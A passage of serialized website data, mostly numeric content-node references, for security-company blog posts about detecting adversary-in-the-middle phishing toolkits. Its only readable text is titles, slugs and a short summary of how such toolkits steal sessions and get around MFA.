ta":240747,"marks":240748,"value":236152,"nodeType":173},{},[],{"data":240750,"content":240751,"nodeType":235},{},[240752],{"data":240753,"marks":240754,"value":236159,"nodeType":173},{},[],{"data":240756,"content":240757,"nodeType":178},{},[240758,240761,240765],{"data":240759,"marks":240760,"value":236166,"nodeType":173},{},[],{"data":240762,"marks":240763,"value":236171,"nodeType":173},{},[240764],{"type":370},{"data":240766,"marks":240767,"value":236175,"nodeType":173},{},[],{"data":240769,"content":240770,"nodeType":178},{},[240771],{"data":240772,"marks":240773,"value":236182,"nodeType":173},{},[],{"data":240775,"content":240776,"nodeType":178},{},[240777],{"data":240778,"marks":240779,"value":236189,"nodeType":173},{},[],{"data":240781,"content":240782,"nodeType":178},{},[240783],{"data":240784,"marks":240785,"value":236196,"nodeType":173},{},[],{"data":240787,"content":240788,"nodeType":178},{},[240789],{"data":240790,"marks":240791,"value":236203,"nodeType":173},{},[],{"data":240793,"content":240794,"nodeType":178},{},[240795,240798,240802],{"data":240796,"marks":240797,"value":236210,"nodeType":173},{},[],{"data":240799,"marks":240800,"value":236215,"nodeType":173},{},[240801],{"type":370},{"data":240803,"marks":240804,"value":236219,"nodeType":173},{},[],{"data":240806,"content":240809,"nodeType":312},{"target":240807},{"sys":240808},{"id":236224,"type":317,"linkType":318},[],{"data":240811,"content":240812,"nodeType":235},{},[240813],{"data":240814,"marks":240815,"value":71801,"nodeType":173},{},[],{"data":240817,"content":240818,"nodeType":178},{},[240819,240822,240828],{"data":240820,"marks":240821,"value":114452,"nodeType":173},{},[],{"data":240823,"content":240824,"nodeType":186},{"uri":473},[240825],{"data":240826,"marks":240827,"value":88194,"nodeType":173},{},[],{"data":240829,"marks":240830,"value":236247,"nodeType":173},{},[],{"items":240832},[240833,240835],{"sys":240834,"name":509},{"id":508},{"sys":240836,"name":18399},{"id":18398},{"items":240838},[240839],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":240840},{"url":516},"content:blog:introducing-aitm-phishing-toolkit-detection-powered-by-the-push-browser.json","blog/introducing-aitm-phishing-toolkit-detection-powered-by-the-push-browser.json","blog/introducing-aitm-phishing-toolkit-detection-powered-by-the-push-browser",{"_path":240845,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":240846,"summary":240848,"title":140020,"subtitle":118,"metaTitle":240866,"synopsis":230548,"hashTags":118,"publishedDate":230549,"slug":230550,"tagsCollection":240867,"relatedBlogPostsCollection":240873,"ogImage":244393,"authorsCollection":244395,"content":244399,"_id":245127,"_type":5439,"_source":5440,"_file":245128,"_stem":245129,"_extension":5439},"/blog/phishing-2-0-how-phishing-toolkits-are-evolving-with-aitm",{"id":202149,"publishedAt":240847},"2025-04-28T18:13:33.867Z",{"json":240849},{"data":240850,"content":240851,"nodeType":165},{},[240852,240859],{"data":240853,"content":240854,"nodeType":178},{},[240855],{"data":240856,"marks":240857,"value":240858,"nodeType":173},{},[],"Attackers are increasingly using new phishing toolkits (open-source, commercial, and criminal) to execute Adversary in the Middle (AitM) attacks. ",{"data":240860,"content":240861,"nodeType":178},{},[240862],{"data":240863,"marks":240864,"value":240865,"nodeType":173},{},[],"AitM enables attackers to not just harvest credentials, but steal live sessions, allowing them to bypass traditional phishing prevention controls such as MFA, EDR, and email content filtering. ","How AitM phishing is being used to circumvent MFA",{"items":240868},[240869,240871],{"sys":240870,"name":505},{"id":504},{"sys":240872,"name":509},{"id":508},{"items":240874},[240875,241349,244029],{"__typename":1528,"sys":240876,"content":240877,"title":236248,"synopsis":236249,"hashTags":118,"publishedDate":236250,"slug":236251,"tagsCollection":241339,"authorsCollection":241345},{"id":189461},{"json":240878},{"data":240879,"content":240880,"nodeType":165},{},[240881,240887,240892,240898,240904,240917,240946,240952,240959,240964,240977,240984,240989,240995,241001,241007,241013,241020,241026,241041,241054,241059,241065,241080,241097,241103,241123,241129,241150,241163,241169,241186,241192,241257,241263,241276,241282,241288,241294,241300,241313,241318,241324],{"data":240882,"content":240883,"nodeType":178},{},[240884],{"data":240885,"marks":240886,"value":37,"nodeType":173},{},[],{"data":240888,"content":240891,"nodeType":312},{"target":240889},{"sys":240890},{"id":235737,"type":317,"linkType":318},[],{"data":240893,"content":240894,"nodeType":178},{},[240895],{"data":240896,"marks":240897,"value":235745,"nodeType":173},{},[],{"data":240899,"content":240900,"nodeType":178},{},[240901],{"data":240902,"marks":240903,"value":235752,"nodeType":173},{},[],{"data":240905,"content":240906,"nodeType":178},{},[240907,240910,240914],{"data":240908,"marks":240909,"value":235759,"nodeType":173},{},[],{"data":240911,"marks":240912,"value":235764,"nodeType":173},{},[240913],{"type":370},{"data":240915,"marks":240916,"value":39946,"nodeType":173},{},[],{"data":240918,"content":240919,"nodeType":250},{},[240920,240933],{"data":240921,"content":240922,"nodeType":254},{},[240923],{"data":240924,"content":240925,"nodeType":178},{},[240926,240930],{"data":240927,"marks":240928,"value":235781,"nodeType":173},{},[240929],{"type":370},{"data":240931,"marks":240932,"value":235785,"nodeType":173},{},[],{"data":240934,"content":240935,"nodeType":254},{},[240936],{"data":240937,"content":240938,"nodeType":178},{},[240939,240943],{"data":240940,"marks":240941,"value":235796,"nodeType":173},{},[240942],{"type":370},{"data":240944,"marks":240945,"value":235800,"nodeType":173},{},[],{"data":240947,"content":240948,"nodeType":178},{},[240949],{"data":240950,"marks":240951,"value":235807,"nodeType":173},{},[],{"data":240953,"content":240954,"nodeType":178},{},[240955],{"data":240956,"marks":240957,"value":235815,"nodeType":173},{},[240958],{"type":370},{"data":240960,"content":240963,"nodeType":312},{"target":240961},{"sys":240962},{"id":227773,"type":317,"linkType":318},[],{"data":240965,"content":240966,"nodeType":178},{},[240967,240970,240974],{"data":240968,"marks":240969,"value":235827,"nodeType":173},{},[],{"data":240971,"marks":240972,"value":125683,"nodeType":173},{},[240973],{"type":370},{"data":240975,"marks":240976,"value":235835,"nodeType":173},{},[],{"data":240978,"content":240979,"nodeType":178},{},[240980],{"data":240981,"marks":240982,"value":235843,"nodeType":173},{},[240983],{"type":370},{"data":240985,"content":240988,"nodeType":312},{"target":240986},{"sys":240987},{"id":235848,"type":317,"linkType":318},[],{"data":240990,"content":240991,"nodeType":235},{},[240992],{"data":240993,"marks":240994,"value":235856,"nodeType":173},{},[],{"data":240996,"content":240997,"nodeType":178},{},[240998],{"data":240999,"marks":241000,"value":235863,"nodeType":173},{},[],{"data":241002,"content":241003,"nodeType":178},{},[241004],{"data":241005,"marks":241006,"value":235870,"nodeType":173},{},[],{"data":241008,"content":241009,"nodeType":178},{},[241010],{"data":241011,"marks":241012,"value":235877,"nodeType":173},{},[],{"data":241014,"content":241015,"nodeType":178},{},[241016],{"data":241017,"marks":241018,"value":235885,"nodeType":173},{},[241019],{"type":370},{"data":241021,"content":241022,"nodeType":178},{},[241023],{"data":241024,"marks":241025,"value":235892,"nodeType":173},{},[],{"data":241027,"content":241028,"nodeType":178},{},[241029,241032,241038],{"data":241030,"marks":241031,"value":196087,"nodeType":173},{},[],{"data":241033,"content":241034,"nodeType":186},{"uri":183466},[241035],{"data":241036,"marks":241037,"value":155030,"nodeType":173},{},[],{"data":241039,"marks":241040,"value":196097,"nodeType":173},{},[],{"data":241042,"content":241043,"nodeType":178},{},[241044,241047,241051],{"data":241045,"marks":241046,"value":235914,"nodeType":173},{},[],{"data":241048,"marks":241049,"value":235919,"nodeType":173},{},[241050],{"type":370},{"data":241052,"marks":241053,"value":235923,"nodeType":173},{},[],{"data":241055,"content":241058,"nodeType":312},{"target":241056},{"sys":241057},{"id":24862,"type":317,"linkType":318},[],{"data":241060,"content":241061,"nodeType":178},{},[241062],{"data":241063,"marks":241064,"value":235935,"nodeType":173},{},[],{"data":241066,"content":241067,"nodeType":178},{},[241068,241071,241077],{"data":241069,"marks":241070,"value":235942,"nodeType":173},{},[],{"data":241072,"content":241073,"nodeType":186},{"uri":114007},[241074],{"data":241075,"marks":241076,"value":235949,"nodeType":173},{},[],{"data":241078,"marks":241079,"value":235953,"nodeType":173},{},[],{"data":241081,"content":241082,"nodeType":178},{},[241083,241086,241094],{"data":241084,"marks":241085,"value":235960,"nodeType":173},{},[],{"data":241087,"content":241090,"nodeType":1698},{"target":241088},{"sys":241089},{"id":2405,"type":317,"linkType":318},[241091],{"data":241092,"marks":241093,"value":21642,"nodeType":173},{},[],{"data":241095,"marks":241096,"value":1477,"nodeType":173},{},[],{"data":241098,"content":241099,"nodeType":235},{},[241100],{"data":241101,"marks":241102,"value":235978,"nodeType":173},{},[],{"data":241104,"content":241105,"nodeType":178},{},[241106,241109,241113,241116,241120],{"data":241107,"marks":241108,"value":235985,"nodeType":173},{},[],{"data":241110,"marks":241111,"value":182376,"nodeType":173},{},[241112],{"type":370},{"data":241114,"marks":241115,"value":933,"nodeType":173},{},[],{"data":241117,"marks":241118,"value":235997,"nodeType":173},{},[241119],{"type":370},{"data":241121,"marks":241122,"value":236001,"nodeType":173},{},[],{"data":241124,"content":241125,"nodeType":178},{},[241126],{"data":241127,"marks":241128,"value":236008,"nodeType":173},{},[],{"data":241130,"content":241131,"nodeType":250},{},[241132,241141],{"data":241133,"content":241134,"nodeType":254},{},[241135],{"data":241136,"content":241137,"nodeType":178},{},[241138],{"data":241139,"marks":241140,"value":236021,"nodeType":173},{},[],{"data":241142,"content":241143,"nodeType":254},{},[241144],{"data":241145,"content":241146,"nodeType":178},{},[241147],{"data":241148,"marks":241149,"value":236031,"nodeType":173},{},[],{"data":241151,"content":241152,"nodeType":178},{},[241153,241156,241160],{"data":241154,"marks":241155,"value":236038,"nodeType":173},{},[],{"data":241157,"marks":241158,"value":236043,"nodeType":173},{},[241159],{"type":1646},{"data":241161,"marks":241162,"value":236047,"nodeType":173},{},[],{"data":241164,"content":241165,"nodeType":235},{},[241166],{"data":241167,"marks":241168,"value":236054,"nodeType":173},{},[],{"data":241170,"content":241171,"nodeType":178},{},[241172,241175,241183],{"data":241173,"marks":241174,"value":236061,"nodeType":173},{},[],{"data":241176,"content":241179,"nodeType":1698},{"target":241177},{"sys":241178},{"id":202170,"type":317,"linkType":318},[241180],{"data":241181,"marks":241182,"value":195823,"nodeType":173},{},[],{"data":241184,"marks":241185,"value":236073,"nodeType":173},{},[],{"data":241187,"content":241188,"nodeType":178},{},[241189],{"data":241190,"marks":241191,"value":236080,"nodeType":173},{},[],{"data":241193,"content":241194,"nodeType":250},{},[241195,241215],{"data":241196,"content":241197,"nodeType":254},{},[241198],{"data":241199,"content":241200,"nodeType":178},{},[241201,241204,241212],{"data":241202,"marks":241203,"value":236093,"nodeType":173},{},[],{"data":241205,"content":241208,"nodeType":1698},{"target":241206},{"sys":241207},{"id":202170,"type":317,"linkType":318},[241209],{"data":241210,"marks":241211,"value":236102,"nodeType":173},{},[],{"data":241213,"marks":241214,"value":1477,"nodeType":173},{},[],{"data":241216,"content":241217,"nodeType":254},{},[241218],{"data":241219,"content":241220,"nodeType":178},{},[241221,241224,241232,241235,241243,241246,241254],{"data":241222,"marks":241223,"value":236115,"nodeType":173},{},[],{"data":241225,"content":241228,"nodeType":1698},{"target":241226},{"sys":241227},{"id":228244,"type":317,"linkType":318},[241229],{"data":241230,"marks":241231,"value":63256,"nodeType":173},{},[],{"data":241233,"marks":241234,"value":236127,"nodeType":173},{},[],{"data":241236,"content":241239,"nodeType":1698},{"target":241237},{"sys":241238},{"id":236132,"type":317,"linkType":318},[241240],{"data":241241,"marks":241242,"value":226380,"nodeType":173},{},[],{"data":241244,"marks":241245,"value":933,"nodeType":173},{},[],{"data":241247,"content":241250,"nodeType":1698},{"target":241248},{"sys":241249},{"id":236144,"type":317,"linkType":318},[241251],{"data":241252,"marks":241253,"value":226391,"nodeType":173},{},[],{"data":241255,"marks":241256,"value":236152,"nodeType":173},{},[],{"data":241258,"content":241259,"nodeType":235},{},[241260],{"data":241261,"marks":241262,"value":236159,"nodeType":173},{},[],{"data":241264,"content":241265,"nodeType":178},{},[241266,241269,241273],{"data":241267,"marks":241268,"value":236166,"nodeType":173},{},[],{"data":241270,"marks":241271,"value":236171,"nodeType":173},{},[241272],{"type":370},{"data":241274,"marks":241275,"value":236175,"nodeType":173},{},[],{"data":241277,"content":241278,"nodeType":178},{},[241279],{"data":241280,"marks":241281,"value":236182,"nodeType":173},{},[],{"data":241283,"content":241284,"nodeType":178},{},[241285],{"data":241286,"marks":241287,"value":236189,"nodeType":173},{},[],{"data":241289,"content":241290,"nodeType":178},{},[241291],{"data":241292,"marks":241293,"value":236196,"nodeType":173},{},[],{"data":241295,"content":241296,"nodeType":178},{},[241297],{"data":241298,"marks":241299,"value":236203,"nodeType":173},{},[],{"data":241301,"content":241302,"nodeType":178},{},[241303,241306,241310],{"data":241304,"marks":241305,"value":236210,"nodeType":173},{},[],{"data":241307,"marks":241308,"value":236215,"nodeType":173},{},[241309],{"type":370},{"data":241311,"marks":241312,"value":236219,"nodeType":173},{},[],{"data":241314,"content":241317,"nodeType":312},{"target":241315},{"sys":241316},{"id":236224,"type":317,"linkType":318},[],{"data":241319,"content":241320,"nodeType":235},{},[241321],{"data":241322,"marks":241323,"value":71801,"nodeType":173},{},[],{"data":241325,"content":241326,"nodeType":178},{},[241327,241330,241336],{"data":241328,"marks":241329,"value":114452,"nodeType":173},{},[],{"data":241331,"content":241332,"nodeType":186},{"uri":473},[241333],{"data":241334,"marks":241335,"value":88194,"nodeType":173},{},[],{"data":241337,"marks":241338,"value":236247,"nodeType":173},{},[],{"items":241340},[241341,241343],{"sys":241342,"name":509},{"id":508},{"sys":241344,"name":18399},{"id":18398},{"items":241346},[241347],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":241348},{"url":516},{"__typename":1528,"sys":241350,"content":241351,"title":223970,"synopsis":223971,"hashTags":118,"publishedDate":223972,"slug":223973,"tagsCollection":244019,"authorsCollection":244025},{"id":202170},{"json":241352},{"nodeType":165,"data":241353,"content":241354},{},[241355,241361,241387,241393,241398,241404,241420,241441,241447,241453,241473,241486,241492,241502,241508,241511,241517,241523,241536,241546,241552,241578,241581,241587,241603,241609,241616,241701,241707,241823,241829,241930,241936,241942,242102,242108,242114,242189,242192,242198,242204,242210,242267,242273,242303,242309,242348,242354,242360,242579,242585,242592,242598,242601,242607,242613,242619,242667,242673,242712,242718,242748,242754,242760,242920,242926,242933,242939,242946,242952,242959,242965,242968,242974,242980,242986,243043,243049,243079,243085,243115,243121,243127,243228,243231,243237,243243,243249,243306,243312,243342,243348,243378,243384,243390,243554,243557,243563,243569,243575,243641,243647,243677,243683,243713,243719,243725,243944,243947,243953,243959,243965,243971,243974,243980,243986,243992,243995,244001,244007,244013],{"nodeType":169,"data":241356,"content":241357},{},[241358],{"nodeType":173,"value":221052,"marks":241359,"data":241360},[],{},{"nodeType":178,"data":241362,"content":241363},{},[241364,241367,241374,241377,241384],{"nodeType":173,"value":221059,"marks":241365,"data":241366},[],{},{"nodeType":186,"data":241368,"content":241369},{"uri":221064},[241370],{"nodeType":173,"value":221067,"marks":241371,"data":241373},[241372],{"type":194},{},{"nodeType":173,"value":221072,"marks":241375,"data":241376},[],{},{"nodeType":186,"data":241378,"content":241379},{"uri":221077},[241380],{"nodeType":173,"value":221080,"marks":241381,"data":241383},[241382],{"type":194},{},{"nodeType":173,"value":1477,"marks":241385,"data":241386},[],{},{"nodeType":178,"data":241388,"content":241389},{},[241390],{"nodeType":173,"value":221091,"marks":241391,"data":241392},[],{},{"nodeType":312,"data":241394,"content":241397},{"target":241395},{"sys":241396},{"id":221098,"type":317,"linkType":318},[],{"nodeType":178,"data":241399,"content":241400},{},[241401],{"nodeType":173,"value":221104,"marks":241402,"data":241403},[],{},{"nodeType":178,"data":241405,"content":241406},{},[241407,241410,241417],{"nodeType":173,"value":221111,"marks":241408,"data":241409},[],{},{"nodeType":186,"data":241411,"content":241412},{"uri":221116},[241413],{"nodeType":173,"value":221119,"marks":241414,"data":241416},[241415],{"type":194},{},{"nodeType":173,"value":221124,"marks":241418,"data":241419},[],{},{"nodeType":250,"data":241421,"content":241422},{},[241423,241432],{"nodeType":254,"data":241424,"content":241425},{},[241426],{"nodeType":178,"data":241427,"content":241428},{},[241429],{"nodeType":173,"value":221137,"marks":241430,"data":241431},[],{},{"nodeType":254,"data":241433,"content":241434},{},[241435],{"nodeType":178,"data":241436,"content":241437},{},[241438],{"nodeType":173,"value":221147,"marks":241439,"data":241440},[],{},{"nodeType":178,"data":241442,"content":241443},{},[241444],{"nodeType":173,"value":221154,"marks":241445,"data":241446},[],{},{"nodeType":235,"data":241448,"content":241449},{},[241450],{"nodeType":173,"value":221161,"marks":241451,"data":241452},[],{},{"nodeType":178,"data":241454,"content":241455},{},[241456,241459,241463,241466,241470],{"nodeType":173,"value":221168,"marks":241457,"data":241458},[],{},{"nodeType":173,"value":221172,"marks":241460,"data":241462},[241461],{"type":370},{},{"nodeType":173,"value":221177,"marks":241464,"data":241465},[],{},{"nodeType":173,"value":221181,"marks":241467,"data":241469},[241468],{"type":1646},{},{"nodeType":173,"value":10557,"marks":241471,"data":241472},[],{},{"nodeType":178,"data":241474,"content":241475},{},[241476,241479,241483],{"nodeType":173,"value":221192,"marks":241477,"data":241478},[],{},{"nodeType":173,"value":221196,"marks":241480,"data":241482},[241481],{"type":370},{},{"nodeType":173,"value":221201,"marks":241484,"data":241485},[],{},{"nodeType":178,"data":241487,"content":241488},{},[241489],{"nodeType":173,"value":221208,"marks":241490,"data":241491},[],{},{"nodeType":178,"data":241493,"content":241494},{},[241495,241498],{"nodeType":173,"value":221215,"marks":241496,"data":241497},[],{},{"nodeType":173,"value":221219,"marks":241499,"data":241501},[241500],{"type":370},{},{"nodeType":178,"data":241503,"content":241504},{},[241505],{"nodeType":173,"value":221227,"marks":241506,"data":241507},[],{},{"nodeType":231,"data":241509,"content":241510},{},[],{"nodeType":169,"data":241512,"content":241513},{},[241514],{"nodeType":173,"value":221237,"marks":241515,"data":241516},[],{},{"nodeType":178,"data":241518,"content":241519},{},[241520],{"nodeType":173,"value":221244,"marks":241521,"data":241522},[],{},{"nodeType":178,"data":241524,"content":241525},{},[241526,241529,241533],{"nodeType":173,"value":221251,"marks":241527,"data":241528},[],{},{"nodeType":173,"value":221255,"marks":241530,"data":241532},[241531],{"type":1646},{},{"nodeType":173,"value":221260,"marks":241534,"data":241535},[],{},{"nodeType":178,"data":241537,"content":241538},{},[241539,241542],{"nodeType":173,"value":221267,"marks":241540,"data":241541},[],{},{"nodeType":173,"value":221271,"marks":241543,"data":241545},[241544],{"type":370},{},{"nodeType":178,"data":241547,"content":241548},{},[241549],{"nodeType":173,"value":221279,"marks":241550,"data":241551},[],{},{"nodeType":178,"data":241553,"content":241554},{},[241555,241558,241565,241568,241575],{"nodeType":173,"value":221286,"marks":241556,"data":241557},[],{},{"nodeType":186,"data":241559,"content":241560},{"uri":88239},[241561],{"nodeType":173,"value":221293,"marks":241562,"data":241564},[241563],{"type":194},{},{"nodeType":173,"value":221298,"marks":241566,"data":241567},[],{},{"nodeType":186,"data":241569,"content":241570},{"uri":221303},[241571],{"nodeType":173,"value":221306,"marks":241572,"data":241574},[241573],{"type":194},{},{"nodeType":173,"value":2340,"marks":241576,"data":241577},[],{},{"nodeType":231,"data":241579,"content":241580},{},[],{"nodeType":169,"data":241582,"content":241583},{},[241584],{"nodeType":173,"value":221320,"marks":241585,"data":241586},[],{},{"nodeType":178,"data":241588,"content":241589},{},[241590,241593,241600],{"nodeType":173,"value":221327,"marks":241591,"data":241592},[],{},{"nodeType":186,"data":241594,"content":241595},{"uri":4057},[241596],{"nodeType":173,"value":221334,"marks":241597,"data":241599},[241598],{"type":194},{},{"nodeType":173,"value":197,"marks":241601,"data":241602},[],{},{"nodeType":235,"data":241604,"content":241605},{},[241606],{"nodeType":173,"value":221345,"marks":241607,"data":241608},[],{},{"nodeType":178,"data":241610,"content":241611},{},[241612],{"nodeType":173,"value":221352,"marks":241613,"data":241615},[241614],{"type":1646},{},{"nodeType":250,"data":241617,"content":241618},{},[241619,241628,241647,241656,241665,241674,241683,241692],{"nodeType":254,"data":241620,"content":241621},{},[241622],{"nodeType":178,"data":241623,"content":241624},{},[241625],{"nodeType":173,"value":221366,"marks":241626,"data":241627},[],{},{"nodeType":254,"data":241629,"content":241630},{},[241631],{"nodeType":178,"data":241632,"content":241633},{},[241634,241637,241644],{"nodeType":173,"value":221376,"marks":241635,"data":241636},[],{},{"nodeType":186,"data":241638,"content":241639},{"uri":174799},[241640],{"nodeType":173,"value":221383,"marks":241641,"data":241643},[241642],{"type":194},{},{"nodeType":173,"value":221388,"marks":241645,"data":241646},[],{},{"nodeType":254,"data":241648,"content":241649},{},[241650],{"nodeType":178,"data":241651,"content":241652},{},[241653],{"nodeType":173,"value":221398,"marks":241654,"data":241655},[],{},{"nodeType":254,"data":241657,"content":241658},{},[241659],{"nodeType":178,"data":241660,"content":241661},{},[241662],{"nodeType":173,"value":4245,"marks":241663,"data":241664},[],{},{"nodeType":254,"data":241666,"content":241667},{},[241668],{"nodeType":178,"data":241669,"content":241670},{},[241671],{"nodeType":173,"value":4255,"marks":241672,"data":241673},[],{},{"nodeType":254,"data":241675,"content":241676},{},[241677],{"nodeType":178,"data":241678,"content":241679},{},[241680],{"nodeType":173,"value":4265,"marks":241681,"data":241682},[],{},{"nodeType":254,"data":241684,"content":241685},{},[241686],{"nodeType":178,"data":241687,"content":241688},{},[241689],{"nodeType":173,"value":221435,"marks":241690,"data":241691},[],{},{"nodeType":254,"data":241693,"content":241694},{},[241695],{"nodeType":178,"data":241696,"content":241697},{},[241698],{"nodeType":173,"value":221445,"marks":241699,"data":241700},[],{},{"nodeType":235,"data":241702,"content":241703},{},[241704],{"nodeType":173,"value":221452,"marks":241705,"data":241706},[],{},{"nodeType":250,"data":241708,"content":241709},{},[241710,241726,241752,241775,241791,241807],{"nodeType":254,"data":241711,"content":241712},{},[241713],{"nodeType":178,"data":241714,"content":241715},{},[241716,241719,241723],{"nodeType":173,"value":221465,"marks":241717,"data":241718},[],{},{"nodeType":173,"value":221469,"marks":241720,"data":241722},[241721],{"type":370},{},{"nodeType":173,"value":221474,"marks":241724,"data":241725},[],{},{"nodeType":254,"data":241727,"content":241728},{},[241729],{"nodeType":178,"data":241730,"content":241731},{},[241732,241735,241739,241742,241749],{"nodeType":173,"value":221484,"marks":241733,"data":241734},[],{},{"nodeType":173,"value":221488,"marks":241736,"data":241738},[241737],{"type":370},{},{"nodeType":173,"value":221493,"marks":241740,"data":241741},[],{},{"nodeType":186,"data":241743,"content":241744},{"uri":3999},[241745],{"nodeType":173,"value":4005,"marks":241746,"data":241748},[241747],{"type":194},{},{"nodeType":173,"value":4009,"marks":241750,"data":241751},[],{},{"nodeType":254,"data":241753,"content":241754},{},[241755],{"nodeType":178,"data":241756,"content":241757},{},[241758,241761,241765,241768,241772],{"nodeType":173,"value":221513,"marks":241759,"data":241760},[],{},{"nodeType":173,"value":221517,"marks":241762,"data":241764},[241763],{"type":370},{},{"nodeType":173,"value":221522,"marks":241766,"data":241767},[],{},{"nodeType":173,"value":221526,"marks":241769,"data":241771},[241770],{"type":370},{},{"nodeType":173,"value":221531,"marks":241773,"data":241774},[],{},{"nodeType":254,"data":241776,"content":241777},{},[241778],{"nodeType":178,"data":241779,"content":241780},{},[241781,241784,241788],{"nodeType":173,"value":221541,"marks":241782,"data":241783},[],{},{"nodeType":173,"value":221545,"marks":241785,"data":241787},[241786],{"type":370},{},{"nodeType":173,"value":221550,"marks":241789,"data":241790},[],{},{"nodeType":254,"data":241792,"content":241793},{},[241794],{"nodeType":178,"data":241795,"content":241796},{},[241797,241800,241804],{"nodeType":173,"value":221560,"marks":241798,"data":241799},[],{},{"nodeType":173,"value":221564,"marks":241801,"data":241803},[241802],{"type":370},{},{"nodeType":173,"value":221569,"marks":241805,"data":241806},[],{},{"nodeType":254,"data":241808,"content":241809},{},[241810],{"nodeType":178,"data":241811,"content":241812},{},[241813,241816,241820],{"nodeType":173,"value":221579,"marks":241814,"data":241815},[],{},{"nodeType":173,"value":221583,"marks":241817,"data":241819},[241818],{"type":370},{},{"nodeType":173,"value":221588,"marks":241821,"data":241822},[],{},{"nodeType":235,"data":241824,"content":241825},{},[241826],{"nodeType":173,"value":221595,"marks":241827,"data":241828},[],{},{"nodeType":250,"data":241830,"content":241831},{},[241832,241848,241884,241907],{"nodeType":254,"data":241833,"content":241834},{},[241835],{"nodeType":178,"data":241836,"content":241837},{},[241838,241841,241845],{"nodeType":173,"value":221608,"marks":241839,"data":241840},[],{},{"nodeType":173,"value":221612,"marks":241842,"data":241844},[241843],{"type":370},{},{"nodeType":173,"value":221617,"marks":241846,"data":241847},[],{},{"nodeType":254,"data":241849,"content":241850},{},[241851],{"nodeType":178,"data":241852,"content":241853},{},[241854,241857,241864,241867,241871,241874,241881],{"nodeType":173,"value":221627,"marks":241855,"data":241856},[],{},{"nodeType":186,"data":241858,"content":241859},{"uri":832},[241860],{"nodeType":173,"value":835,"marks":241861,"data":241863},[241862],{"type":194},{},{"nodeType":173,"value":2936,"marks":241865,"data":241866},[],{},{"nodeType":173,"value":221641,"marks":241868,"data":241870},[241869],{"type":370},{},{"nodeType":173,"value":221646,"marks":241872,"data":241873},[],{},{"nodeType":186,"data":241875,"content":241876},{"uri":184425},[241877],{"nodeType":173,"value":221653,"marks":241878,"data":241880},[241879],{"type":194},{},{"nodeType":173,"value":481,"marks":241882,"data":241883},[],{},{"nodeType":254,"data":241885,"content":241886},{},[241887],{"nodeType":178,"data":241888,"content":241889},{},[241890,241894,241897,241904],{"nodeType":173,"value":221667,"marks":241891,"data":241893},[241892],{"type":370},{},{"nodeType":173,"value":221672,"marks":241895,"data":241896},[],{},{"nodeType":186,"data":241898,"content":241899},{"uri":4411},[241900],{"nodeType":173,"value":221679,"marks":241901,"data":241903},[241902],{"type":194},{},{"nodeType":173,"value":221684,"marks":241905,"data":241906},[],{},{"nodeType":254,"data":241908,"content":241909},{},[241910],{"nodeType":178,"data":241911,"content":241912},{},[241913,241916,241920,241923,241927],{"nodeType":173,"value":221694,"marks":241914,"data":241915},[],{},{"nodeType":173,"value":221698,"marks":241917,"data":241919},[241918],{"type":370},{},{"nodeType":173,"value":221703,"marks":241921,"data":241922},[],{},{"nodeType":173,"value":221707,"marks":241924,"data":241926},[241925],{"type":370},{},{"nodeType":173,"value":221712,"marks":241928,"data":241929},[],{},{"nodeType":235,"data":241931,"content":241932},{},[241933],{"nodeType":173,"value":221719,"marks":241934,"data":241935},[],{},{"nodeType":178,"data":241937,"content":241938},{},[241939],{"nodeType":173,"value":221726,"marks":241940,"data":241941},[],{},{"nodeType":1653,"data":241943,"content":241944},{},[241945,241984,242043],{"nodeType":1657,"data":241946,"content":241947},{},[241948,241957,241966,241975],{"nodeType":1661,"data":241949,"content":241950},{},[241951],{"nodeType":178,"data":241952,"content":241953},{},[241954],{"nodeType":173,"value":221742,"marks":241955,"data":241956},[],{},{"nodeType":1661,"data":241958,"content":241959},{},[241960],{"nodeType":178,"data":241961,"content":241962},{},[241963],{"nodeType":173,"value":221752,"marks":241964,"data":241965},[],{},{"nodeType":1661,"data":241967,"content":241968},{},[241969],{"nodeType":178,"data":241970,"content":241971},{},[241972],{"nodeType":173,"value":221762,"marks":241973,"data":241974},[],{},{"nodeType":1661,"data":241976,"content":241977},{},[241978],{"nodeType":178,"data":241979,"content":241980},{},[241981],{"nodeType":173,"value":221772,"marks":241982,"data":241983},[],{},{"nodeType":1657,"data":241985,"content":241986},{},[241987,242006,242025,242034],{"nodeType":1687,"data":241988,"content":241989},{},[241990],{"nodeType":178,"data":241991,"content":241992},{},[241993,241996,242003],{"nodeType":173,"value":37,"marks":241994,"data":241995},[],{},{"nodeType":186,"data":241997,"content":241998},{"uri":832},[241999],{"nodeType":173,"value":221791,"marks":242000,"data":242002},[242001],{"type":194},{},{"nodeType":173,"value":37,"marks":242004,"data":242005},[],{},{"nodeType":1687,"data":242007,"content":242008},{},[242009],{"nodeType":178,"data":242010,"content":242011},{},[242012,242015,242022],{"nodeType":173,"value":37,"marks":242013,"data":242014},[],{},{"nodeType":186,"data":242016,"content":242017},{"uri":832},[242018],{"nodeType":173,"value":26529,"marks":242019,"data":242021},[242020],{"type":194},{},{"nodeType":173,"value":37,"marks":242023,"data":242024},[],{},{"nodeType":1687,"data":242026,"content":242027},{},[242028],{"nodeType":178,"data":242029,"content":242030},{},[242031],{"nodeType":173,"value":221824,"marks":242032,"data":242033},[],{},{"nodeType":1687,"data":242035,"content":242036},{},[242037],{"nodeType":178,"data":242038,"content":242039},{},[242040],{"nodeType":173,"value":221834,"marks":242041,"data":242042},[],{},{"nodeType":1657,"data":242044,"content":242045},{},[242046,242065,242084,242093],{"nodeType":1687,"data":242047,"content":242048},{},[242049],{"nodeType":178,"data":242050,"content":242051},{},[242052,242055,242062],{"nodeType":173,"value":37,"marks":242053,"data":242054},[],{},{"nodeType":186,"data":242056,"content":242057},{"uri":114992},[242058],{"nodeType":173,"value":221853,"marks":242059,"data":242061},[242060],{"type":194},{},{"nodeType":173,"value":37,"marks":242063,"data":242064},[],{},{"nodeType":1687,"data":242066,"content":242067},{},[242068],{"nodeType":178,"data":242069,"content":242070},{},[242071,242074,242081],{"nodeType":173,"value":37,"marks":242072,"data":242073},[],{},{"nodeType":186,"data":242075,"content":242076},{"uri":114992},[242077],{"nodeType":173,"value":197472,"marks":242078,"data":242080},[242079],{"type":194},{},{"nodeType":173,"value":37,"marks":242082,"data":242083},[],{},{"nodeType":1687,"data":242085,"content":242086},{},[242087],{"nodeType":178,"data":242088,"content":242089},{},[242090],{"nodeType":173,"value":221886,"marks":242091,"data":242092},[],{},{"nodeType":1687,"data":242094,"content":242095},{},[242096],{"nodeType":178,"data":242097,"content":242098},{},[242099],{"nodeType":173,"